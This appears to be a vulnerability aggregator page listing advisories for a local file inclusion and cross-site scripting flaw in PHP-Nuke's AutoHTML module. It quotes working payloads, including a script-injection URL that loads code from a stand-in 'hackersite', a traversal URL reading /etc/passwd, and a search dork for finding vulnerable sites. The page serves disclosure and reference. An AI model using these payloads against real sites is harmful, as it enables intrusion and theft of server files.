EUVD-2006-4180

Malware in sbrugna...

PHP-Nuke 2.0 AutoHTML Module Local File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/19525/info PHP-Nuke AutoHTML Module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit may allow an attacker to execute arbitrary local scripts...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. PHP-Nuke AutoHTML Module 2.0 - crossite scripting...

Cross-Site Scripting vulnerability in AutoHTML for PHP-Nuke

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting уязвимости в AutoHTML для PHP-Nuke. XSS: http://site/autohtml.php?filename=3Cscript20src=http://hackersite/xss.js20 Уязвима версия PHP-Nuke AutoHTML Module 2.0 и потенциально другие версии. Дополнительная информация о данной...

autohtml-lfi.txt

-------------------------------------------------------------------------------------------------------------------------------------- Another Bug on PHP-Nuke autohtml.php AutoHTML Module Local File Inclusion Dork: inurl:autohtml.php?filename=LFI Example:...

PHP-Nuke AutoHTML本地文件包含漏洞

PHP-Nuke是一款基于PHP的站点架构程序。 PHP-Nuke不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限查看系统文件内容。 问题是'autohtml.php'脚本对用户提交的'name'参数缺少过滤，提交包含多个"../"字符作为参数数据，可绕过WEB ROOT限制，以WEB进程权限查看系统文件内容。 PHP-Nuke AutoHTML Module 2.0 http://www.nukeaddon.com/ http://www.site.com/autohtml.php?op=modload&name=../../../../etc/passwd...

CVE-2006-4190

Directory traversal vulnerability in autohtml.php in the AutoHTML module for PHP-Nuke allows local users to include arbitrary files via a .. dot dot in the name parameter for a modload operation...

CVE-2006-4190

Directory traversal vulnerability in autohtml.php in the AutoHTML module for PHP-Nuke allows local users to include arbitrary files via a .. dot dot in the name parameter for a modload operation...

CVE-2006-4190

CVE-2006-4190 is a directory traversal vulnerability in the AutoHTML module for PHP-Nuke, exploitable via a .. in the name parameter of a modload operation within autohtml.php. The affected component is the AutoHTML module’s autohtml.php; root cause is improper handling of the filename parameter ...

PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion

PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion source: https://www.securityfocus.com/bid/19525/info PHP-Nuke AutoHTML Module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit may allow an attacker to execute arbitra...

PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion

source: https://www.securityfocus.com/bid/19525/info PHP-Nuke AutoHTML Module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit may allow an attacker to execute arbitrary local scripts within the context of the affected...